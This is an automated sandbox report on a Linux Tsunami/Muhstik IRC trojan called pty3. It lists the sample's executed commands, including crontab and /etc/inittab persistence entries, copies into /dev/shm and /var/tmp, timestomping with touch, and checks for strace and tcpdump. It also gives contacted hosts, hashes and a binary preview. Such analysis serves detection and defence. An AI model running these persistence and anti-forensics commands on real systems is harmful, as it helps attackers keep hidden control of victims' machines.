Source: /usr/bin/crontab (PID: 5308)	File: /var/spool/cron/crontabs/root	Jump to behavior
Source: /usr/bin/crontab (PID: 5330)	File: /var/spool/cron/crontabs/tmp.ASDRld	Jump to behavior
Source: /usr/bin/crontab (PID: 5330)	File: /var/spool/cron/crontabs/root	Jump to behavior

Explicitly modifies time stamps using the "touch" command

Show sources

Source: /bin/sh (PID: 5250)	Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5274)	Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5296)	Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5316)	Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5336)	Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab	Jump to behavior

Executes the "crontab" command typically for achieving persistence

Show sources

Source: /bin/sh (PID: 5235)	Crontab executable: /usr/bin/crontab -> crontab -r	Jump to behavior
Source: /bin/sh (PID: 5238)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5244)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5243)	Crontab executable: /usr/bin/crontab -> crontab -	Jump to behavior
Source: /bin/sh (PID: 5262)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5268)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5267)	Crontab executable: /usr/bin/crontab -> crontab -	Jump to behavior
Source: /bin/sh (PID: 5282)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5290)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5289)	Crontab executable: /usr/bin/crontab -> crontab -	Jump to behavior
Source: /bin/sh (PID: 5304)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5309)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5308)	Crontab executable: /usr/bin/crontab -> crontab -	Jump to behavior
Source: /bin/sh (PID: 5324)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5331)	Crontab executable: /usr/bin/crontab -> crontab -l	Jump to behavior
Source: /bin/sh (PID: 5330)	Crontab executable: /usr/bin/crontab -> crontab -	Jump to behavior

Source: /usr/bin/cp (PID: 5255)	File written: /dev/shm/pty3	Jump to dropped file
Source: /usr/bin/cp (PID: 5276)	File written: /var/tmp/pty3	Jump to dropped file
Source: /usr/bin/cp (PID: 5298)	File written: /run/lock/pty3	Jump to dropped file
Source: /usr/bin/cp (PID: 5318)	File written: /run/pty3	Jump to dropped file

Source: /bin/sh (PID: 5239)	Grep executable: /usr/bin/grep -> grep /tmp/pty3	Jump to behavior
Source: /bin/sh (PID: 5240)	Grep executable: /usr/bin/grep -> grep -v "no cron"	Jump to behavior
Source: /bin/sh (PID: 5237)	Grep executable: /usr/bin/grep -> grep -v /tmp/pty3	Jump to behavior
Source: /bin/sh (PID: 5263)	Grep executable: /usr/bin/grep -> grep /dev/shm/pty3	Jump to behavior
Source: /bin/sh (PID: 5264)	Grep executable: /usr/bin/grep -> grep -v "no cron"	Jump to behavior
Source: /bin/sh (PID: 5261)	Grep executable: /usr/bin/grep -> grep -v /dev/shm/pty3	Jump to behavior
Source: /bin/sh (PID: 5283)	Grep executable: /usr/bin/grep -> grep /var/tmp/pty3	Jump to behavior
Source: /bin/sh (PID: 5284)	Grep executable: /usr/bin/grep -> grep -v "no cron"	Jump to behavior
Source: /bin/sh (PID: 5281)	Grep executable: /usr/bin/grep -> grep -v /var/tmp/pty3	Jump to behavior
Source: /bin/sh (PID: 5305)	Grep executable: /usr/bin/grep -> grep /var/lock/pty3	Jump to behavior
Source: /bin/sh (PID: 5306)	Grep executable: /usr/bin/grep -> grep -v "no cron"	Jump to behavior
Source: /bin/sh (PID: 5303)	Grep executable: /usr/bin/grep -> grep -v /var/lock/pty3	Jump to behavior
Source: /bin/sh (PID: 5325)	Grep executable: /usr/bin/grep -> grep /var/run/pty3	Jump to behavior
Source: /bin/sh (PID: 5326)	Grep executable: /usr/bin/grep -> grep -v "no cron"	Jump to behavior
Source: /bin/sh (PID: 5323)	Grep executable: /usr/bin/grep -> grep -v /var/run/pty3	Jump to behavior

Source: /usr/bin/crontab (PID: 5243)	Crontab like entry written: /var/spool/cron/crontabs/tmp.001wAF	Jump to dropped file
Source: /usr/bin/crontab (PID: 5267)	Crontab like entry written: /var/spool/cron/crontabs/tmp.FFzEXt	Jump to dropped file
Source: /usr/bin/crontab (PID: 5289)	Crontab like entry written: /var/spool/cron/crontabs/tmp.7EMzq6	Jump to dropped file
Source: /usr/bin/crontab (PID: 5308)	Crontab like entry written: /var/spool/cron/crontabs/tmp.2HVWUA	Jump to dropped file
Source: /usr/bin/crontab (PID: 5330)	Crontab like entry written: /var/spool/cron/crontabs/tmp.ASDRld	Jump to dropped file

Source: /tmp/pty3 (PID: 5224)	Shell command executed: sh -c "pidof -x strace > /dev/null"	Jump to behavior
Source: /tmp/pty3 (PID: 5226)	Shell command executed: sh -c "pidof -x tcpdump > /dev/null"	Jump to behavior
Source: /tmp/pty3 (PID: 5232)	Shell command executed: sh -c "crontab -r"	Jump to behavior
Source: /tmp/pty3 (PID: 5234)	Shell command executed: sh -c "crontab -l \| grep /tmp/pty3 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /tmp/pty3 > /dev/null 2>&1 &\") \| crontab -"	Jump to behavior
Source: /tmp/pty3 (PID: 5233)	Shell command executed: sh -c "cat /etc/inittab \| grep -v \"/tmp/pty3\" > /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5241)	Shell command executed: sh -c "echo \"0:2345:respawn:/tmp/pty3\" >> /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5245)	Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"	Jump to behavior
Source: /tmp/pty3 (PID: 5247)	Shell command executed: sh -c "rm -rf /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5249)	Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"	Jump to behavior
Source: /tmp/pty3 (PID: 5252)	Shell command executed: sh -c "cp -f /tmp/pty3 /dev/shm/pty3"	Jump to behavior
Source: /tmp/pty3 (PID: 5259)	Shell command executed: sh -c "crontab -l \| grep /dev/shm/pty3 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /dev/shm/pty3 > /dev/null 2>&1 &\") \| crontab -"	Jump to behavior
Source: /tmp/pty3 (PID: 5258)	Shell command executed: sh -c "cat /etc/inittab \| grep -v \"/dev/shm/pty3\" > /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5265)	Shell command executed: sh -c "echo \"0:2345:respawn:/dev/shm/pty3\" >> /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5269)	Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"	Jump to behavior
Source: /tmp/pty3 (PID: 5271)	Shell command executed: sh -c "rm -rf /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5273)	Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"	Jump to behavior
Source: /tmp/pty3 (PID: 5275)	Shell command executed: sh -c "cp -f /tmp/pty3 /var/tmp/pty3"	Jump to behavior
Source: /tmp/pty3 (PID: 5279)	Shell command executed: sh -c "crontab -l \| grep /var/tmp/pty3 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /var/tmp/pty3 > /dev/null 2>&1 &\") \| crontab -"	Jump to behavior
Source: /tmp/pty3 (PID: 5278)	Shell command executed: sh -c "cat /etc/inittab \| grep -v \"/var/tmp/pty3\" > /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5287)	Shell command executed: sh -c "echo \"0:2345:respawn:/var/tmp/pty3\" >> /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5291)	Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"	Jump to behavior
Source: /tmp/pty3 (PID: 5293)	Shell command executed: sh -c "rm -rf /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5295)	Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"	Jump to behavior
Source: /tmp/pty3 (PID: 5297)	Shell command executed: sh -c "cp -f /tmp/pty3 /var/lock/pty3"	Jump to behavior
Source: /tmp/pty3 (PID: 5301)	Shell command executed: sh -c "crontab -l \| grep /var/lock/pty3 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /var/lock/pty3 > /dev/null 2>&1 &\") \| crontab -"	Jump to behavior
Source: /tmp/pty3 (PID: 5300)	Shell command executed: sh -c "cat /etc/inittab \| grep -v \"/var/lock/pty3\" > /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5310)	Shell command executed: sh -c "echo \"0:2345:respawn:/var/lock/pty3\" >> /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5311)	Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"	Jump to behavior
Source: /tmp/pty3 (PID: 5313)	Shell command executed: sh -c "rm -rf /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5315)	Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"	Jump to behavior
Source: /tmp/pty3 (PID: 5317)	Shell command executed: sh -c "cp -f /tmp/pty3 /var/run/pty3"	Jump to behavior
Source: /tmp/pty3 (PID: 5321)	Shell command executed: sh -c "crontab -l \| grep /var/run/pty3 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /var/run/pty3 > /dev/null 2>&1 &\") \| crontab -"	Jump to behavior
Source: /tmp/pty3 (PID: 5320)	Shell command executed: sh -c "cat /etc/inittab \| grep -v \"/var/run/pty3\" > /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5327)	Shell command executed: sh -c "echo \"0:2345:respawn:/var/run/pty3\" >> /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5329)	Shell command executed: sh -c "cat /etc/inittab2 > /etc/inittab"	Jump to behavior
Source: /tmp/pty3 (PID: 5333)	Shell command executed: sh -c "rm -rf /etc/inittab2"	Jump to behavior
Source: /tmp/pty3 (PID: 5335)	Shell command executed: sh -c "touch -acmr /bin/ls /etc/inittab"	Jump to behavior
Source: /tmp/pty3 (PID: 5254)	Shell command executed: sh -c "/bin/uname -n"	Jump to behavior

Source: /bin/sh (PID: 5248)	Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2	Jump to behavior
Source: /bin/sh (PID: 5272)	Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2	Jump to behavior
Source: /bin/sh (PID: 5294)	Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2	Jump to behavior
Source: /bin/sh (PID: 5314)	Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2	Jump to behavior
Source: /bin/sh (PID: 5334)	Rm executable: /usr/bin/rm -> rm -rf /etc/inittab2	Jump to behavior

Source: /bin/sh (PID: 5250)	Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5274)	Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5296)	Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5316)	Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittab	Jump to behavior
Source: /bin/sh (PID: 5336)	Touch executable: /usr/bin/touch -> touch -acmr /bin/ls /etc/inittab	Jump to behavior

Source: submitted sample

Stderr: cat: /etc/inittabno crontab for rootno crontab for root: No such file or directoryno crontab for root: exit code = 0

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: IRC traffic on port 48714 -> 8080
Source: unknown	Network traffic detected: IRC traffic on port 48714 -> 8080

Source: /bin/uname (PID: 5256)

Queries kernel information via 'uname':

Jump to behavior

Stealing of Sensitive Information:

Yara detected Muhstik

Show sources

Source: Yara match	File source: 5251.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5257.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5277.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5231.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5319.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5223.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5299.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5230.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY

Yara detected Tsunami

Show sources

Source: Yara match	File source: 5251.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5257.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5277.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5231.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5319.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5223.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5299.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5230.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pty3 PID: 5223, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5230, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5231, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5251, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5257, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5277, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5299, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5319, type: MEMORYSTR

Remote Access Functionality:

Yara detected Muhstik

Show sources

Source: Yara match	File source: 5251.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5257.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5277.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5231.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5319.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5223.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5299.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5230.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY

Yara detected Tsunami

Show sources

Source: Yara match	File source: 5251.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5257.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5277.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5231.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5319.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5223.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5299.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5230.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pty3 PID: 5223, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5230, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5231, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5251, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5257, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5277, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5299, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pty3 PID: 5319, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job11	Scheduled Task/Job11	Scheduled Task/Job11	Scripting1	OS Credential Dumping	Security Software Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting1	At (Linux)1	At (Linux)1	Timestomp1	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)1	Logon Script (Windows)	Logon Script (Windows)	Indicator Removal on Host1	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	File Deletion1	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
pty3	43%	Virustotal		Browse
pty3	51%	ReversingLabs	Linux.Trojan.Tsunami

Dropped Files

Source	Detection	Scanner	Label	Link
/dev/shm/pty3	43%	Virustotal		Browse
/dev/shm/pty3	51%	ReversingLabs	Linux.Trojan.Tsunami
/run/lock/pty3	43%	Virustotal		Browse
/run/lock/pty3	51%	ReversingLabs	Linux.Trojan.Tsunami
/run/pty3	51%	ReversingLabs	Linux.Trojan.Tsunami
/var/tmp/pty3	51%	ReversingLabs	Linux.Trojan.Tsunami

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
l.deutschland-zahlung.net	unknown	unknown	true		unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
45.132.241.68	unknown	Germany	47583	AS-HOSTINGERLT	false
156.67.220.165	unknown	Cyprus	47583	AS-HOSTINGERLT	true
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Runtime Messages

Command:	/tmp/pty3
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:	cat: /etc/inittabno crontab for root no crontab for root : No such file or directory no crontab for root

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
156.67.220.165	pty4	Get hash	malicious	Browse
156.67.220.165	pty4	Get hash	malicious	Browse
109.202.202.202	pty4	Get hash	malicious	Browse
	ju6Wbtio60	Get hash	malicious	Browse
	RvDKaRDE3k	Get hash	malicious	Browse
	20DMSKyJbk	Get hash	malicious	Browse
	HrNNgx1ZG7	Get hash	malicious	Browse
	UZBQyM62Oc	Get hash	malicious	Browse
	z6jmJpo1pX	Get hash	malicious	Browse
	Cq2ydpw3Tf	Get hash	malicious	Browse
	8qoiarDkDC	Get hash	malicious	Browse
	4Ks3mBzVng	Get hash	malicious	Browse
	H5V4UsjFzH	Get hash	malicious	Browse
	Pe3HHKmZE6	Get hash	malicious	Browse
	ovVhfBgkQl	Get hash	malicious	Browse
	5kVsQcLDDh	Get hash	malicious	Browse
	3zO446cx2s	Get hash	malicious	Browse
	2X6QIRRS4l	Get hash	malicious	Browse
	oewnQ6R3TQ	Get hash	malicious	Browse
	3C78SULNtd	Get hash	malicious	Browse
	AVXhknAf97	Get hash	malicious	Browse
	qUcT4ggKE9	Get hash	malicious	Browse
91.189.91.43	pty4	Get hash	malicious	Browse
	ju6Wbtio60	Get hash	malicious	Browse
	RvDKaRDE3k	Get hash	malicious	Browse
	20DMSKyJbk	Get hash	malicious	Browse
	HrNNgx1ZG7	Get hash	malicious	Browse
	UZBQyM62Oc	Get hash	malicious	Browse
	z6jmJpo1pX	Get hash	malicious	Browse
	Cq2ydpw3Tf	Get hash	malicious	Browse
	8qoiarDkDC	Get hash	malicious	Browse
	4Ks3mBzVng	Get hash	malicious	Browse
	H5V4UsjFzH	Get hash	malicious	Browse
	Pe3HHKmZE6	Get hash	malicious	Browse
	ovVhfBgkQl	Get hash	malicious	Browse
	5kVsQcLDDh	Get hash	malicious	Browse
	3zO446cx2s	Get hash	malicious	Browse
	2X6QIRRS4l	Get hash	malicious	Browse
	oewnQ6R3TQ	Get hash	malicious	Browse
	3C78SULNtd	Get hash	malicious	Browse
	AVXhknAf97	Get hash	malicious	Browse
	qUcT4ggKE9	Get hash	malicious	Browse
91.189.91.42	pty4	Get hash	malicious	Browse
	ju6Wbtio60	Get hash	malicious	Browse
	RvDKaRDE3k	Get hash	malicious	Browse
	20DMSKyJbk	Get hash	malicious	Browse
	HrNNgx1ZG7	Get hash	malicious	Browse
	UZBQyM62Oc	Get hash	malicious	Browse
	z6jmJpo1pX	Get hash	malicious	Browse
	Cq2ydpw3Tf	Get hash	malicious	Browse
	8qoiarDkDC	Get hash	malicious	Browse
	4Ks3mBzVng	Get hash	malicious	Browse
	H5V4UsjFzH	Get hash	malicious	Browse
	Pe3HHKmZE6	Get hash	malicious	Browse
	ovVhfBgkQl	Get hash	malicious	Browse
	5kVsQcLDDh	Get hash	malicious	Browse
	3zO446cx2s	Get hash	malicious	Browse
	2X6QIRRS4l	Get hash	malicious	Browse
	oewnQ6R3TQ	Get hash	malicious	Browse
	3C78SULNtd	Get hash	malicious	Browse
	AVXhknAf97	Get hash	malicious	Browse
	qUcT4ggKE9	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-HOSTINGERLT	pty4	Get hash	malicious	Browse	156.67.220.165
	1POs12.doc	Get hash	malicious	Browse	2.57.90.16
	pty4	Get hash	malicious	Browse	156.67.220.165
	pty1	Get hash	malicious	Browse	45.132.242.233
	gNHWpkzcZ2	Get hash	malicious	Browse	153.92.4.31
	bWWYiK6e8P	Get hash	malicious	Browse	153.92.4.31
	02tGmRk9B8	Get hash	malicious	Browse	153.92.4.31
	ZcxVQiqSNT	Get hash	malicious	Browse	153.92.4.31
	SKM6197534BT New Order.xlsx	Get hash	malicious	Browse	2.57.90.16
	RFQ - Mopcoms Turkey .xlsx	Get hash	malicious	Browse	45.130.228.232
	Logo Embroidery-Auto Inquiry.xlsx	Get hash	malicious	Browse	31.170.167.224
	AUCAe6w7Nm.exe	Get hash	malicious	Browse	31.170.167.224
	Request for Quotation - 4RFQ001247.xlsx	Get hash	malicious	Browse	31.170.167.224
	Quotation for Urgent PO 110921.exe	Get hash	malicious	Browse	2.57.90.16
	j1MTWQvoZS.exe	Get hash	malicious	Browse	31.170.167.224
	fhs2UR1fSG.exe	Get hash	malicious	Browse	2.57.90.16
	PO 211213-0221A.exe	Get hash	malicious	Browse	193.168.192.133
	GHPYl58St4.exe	Get hash	malicious	Browse	31.170.167.224
	DHL SHIPMENT ADDRESS.xlsx	Get hash	malicious	Browse	31.170.167.224
	Aviso 9858.xlsm	Get hash	malicious	Browse	37.44.244.177
INIT7CH	pty4	Get hash	malicious	Browse	109.202.202.202
	ju6Wbtio60	Get hash	malicious	Browse	109.202.202.202
	RvDKaRDE3k	Get hash	malicious	Browse	109.202.202.202
	20DMSKyJbk	Get hash	malicious	Browse	109.202.202.202
	HrNNgx1ZG7	Get hash	malicious	Browse	109.202.202.202
	UZBQyM62Oc	Get hash	malicious	Browse	109.202.202.202
	z6jmJpo1pX	Get hash	malicious	Browse	109.202.202.202
	Cq2ydpw3Tf	Get hash	malicious	Browse	109.202.202.202
	8qoiarDkDC	Get hash	malicious	Browse	109.202.202.202
	4Ks3mBzVng	Get hash	malicious	Browse	109.202.202.202
	H5V4UsjFzH	Get hash	malicious	Browse	109.202.202.202
	Pe3HHKmZE6	Get hash	malicious	Browse	109.202.202.202
	ovVhfBgkQl	Get hash	malicious	Browse	109.202.202.202
	5kVsQcLDDh	Get hash	malicious	Browse	109.202.202.202
	3zO446cx2s	Get hash	malicious	Browse	109.202.202.202
	2X6QIRRS4l	Get hash	malicious	Browse	109.202.202.202
	oewnQ6R3TQ	Get hash	malicious	Browse	109.202.202.202
	3C78SULNtd	Get hash	malicious	Browse	109.202.202.202
	AVXhknAf97	Get hash	malicious	Browse	109.202.202.202
	qUcT4ggKE9	Get hash	malicious	Browse	109.202.202.202
AS-HOSTINGERLT	pty4	Get hash	malicious	Browse	156.67.220.165
	1POs12.doc	Get hash	malicious	Browse	2.57.90.16
	pty4	Get hash	malicious	Browse	156.67.220.165
	pty1	Get hash	malicious	Browse	45.132.242.233
	gNHWpkzcZ2	Get hash	malicious	Browse	153.92.4.31
	bWWYiK6e8P	Get hash	malicious	Browse	153.92.4.31
	02tGmRk9B8	Get hash	malicious	Browse	153.92.4.31
	ZcxVQiqSNT	Get hash	malicious	Browse	153.92.4.31
	SKM6197534BT New Order.xlsx	Get hash	malicious	Browse	2.57.90.16
	RFQ - Mopcoms Turkey .xlsx	Get hash	malicious	Browse	45.130.228.232
	Logo Embroidery-Auto Inquiry.xlsx	Get hash	malicious	Browse	31.170.167.224
	AUCAe6w7Nm.exe	Get hash	malicious	Browse	31.170.167.224
	Request for Quotation - 4RFQ001247.xlsx	Get hash	malicious	Browse	31.170.167.224
	Quotation for Urgent PO 110921.exe	Get hash	malicious	Browse	2.57.90.16
	j1MTWQvoZS.exe	Get hash	malicious	Browse	31.170.167.224
	fhs2UR1fSG.exe	Get hash	malicious	Browse	2.57.90.16
	PO 211213-0221A.exe	Get hash	malicious	Browse	193.168.192.133
	GHPYl58St4.exe	Get hash	malicious	Browse	31.170.167.224
	DHL SHIPMENT ADDRESS.xlsx	Get hash	malicious	Browse	31.170.167.224
	Aviso 9858.xlsm	Get hash	malicious	Browse	37.44.244.177

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

/dev/shm/pty3 Download File
Process:	/usr/bin/cp
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
Category:	dropped
Size (bytes):	48980
Entropy (8bit):	7.873177412760172
Encrypted:	false
SSDEEP:	768:OiLxh+reNihi1th267sCpgTw59MweK5MBNjMNJAWZWXeZxdcNm9t/sjucZ:tPe2tsCpWcMweK5MMDzo8dc89tDw
MD5:	FDD5532C5EC4D3238D2FD36B0A0B187F
SHA1:	0E281FA38DCD1C3DB0F9059991A351AD4D67238D
SHA-256:	C01FA3E23232DA79E1EE1E722050AB8AC09B90BFEBBF93A440BC1316EF7A127C
SHA-512:	27DF31AE49131BA273A06511EE9B5975E81679DDB6BBE4F697F8E83DC3A5DD11BA2DD5E4C4F58CA32A2ED5A38CE547D625B80B9D5CCA1D494292058F411D330E
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 43%, Browse Antivirus: ReversingLabs, Detection: 51%
Reputation:	low
Preview:	.ELF..............>.............@...................@.8...@.....................................................................P.......P.Q.....P.Q............................./l......p...................b.........!..ELF......>....@.m.m...H.#..v..8......+...@..<a..R.....&.;...Q...}v.&-.Z.7Q.td ................Q..P....I.....H.......d...............=.x..UH..t..8........7..Q...H......H..u.0......t...RA........y?...f...m...U$P...yQ.vw3g,.\=cO.t.J...O...R"I...A..?H..o..1...^@./..PTH..0M@..o.-.....I....O....~...+..E.N...C.;....H...H...H...k)....}.@zQu.".....O.. ...(..?.....}..~...a.}..~..nuBE.".....U......Fy..1...u....7.=6..E..h...c......."e..na G. .....1.x..r2.....!...~'..1.u.x.....x.%..Jkx.. .rJ. 9..c.+.x.Pr..w.wgG..w.!..B..+{w`wr(9.?w.wC..Q.vB+..%..v.v.vv..J.v^!).p.+Ov..C.4v.v.u...%.!+(9...u.u..Pr}u\u!...2!.+#u..JN.u.t..(9.t.! 